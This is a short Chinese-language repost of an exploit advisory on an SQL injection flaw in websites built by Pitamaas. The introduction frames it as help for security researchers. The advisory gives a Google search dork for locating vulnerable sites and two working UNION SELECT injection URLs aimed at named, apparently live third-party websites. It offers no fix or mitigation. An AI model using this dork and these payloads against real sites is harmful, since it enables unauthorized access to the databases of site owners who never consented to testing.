Pitamaas SQL注入漏洞分析与利用

本文详细分析了Pitamaas存在的SQL注入漏洞,提供了完整的漏洞利用方法和验证过程,包括Google搜索语法和具体的注入Payload示例,帮助安全研究人员识别和防范此类Web应用安全风险。

Pitamaas - SQL注入

2025.06.29 作者:behrouz mansoori (IR)

风险等级:本地利用:远程利用:CVE:CWE:搜索语法: “Designed & Developed by: Pitamaas”

漏洞标题: Pitamaas - SQL注入 日期: 2025-06-27 漏洞作者: Behrouz Mansoori Google搜索语法: “Designed & Developed by: Pitamaas” 分类: webapps 测试环境: Mac, Firefox

概念验证:

演示: 

1

https://anejagroupofcompanies.com/productdetail.php?id=-9%27%20UNION%20SELECT%201,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--+

1

https://www.falcontools.com/product-detail.php?pro-id=-29%20UNION%20SELECT%201,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88--

发现者: Behrouz mansoori Instagram: Behrouz_mansoori 邮箱: mr.mansoori@yahoo.com

comments powered by Disqus
© 2020 - 2025 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次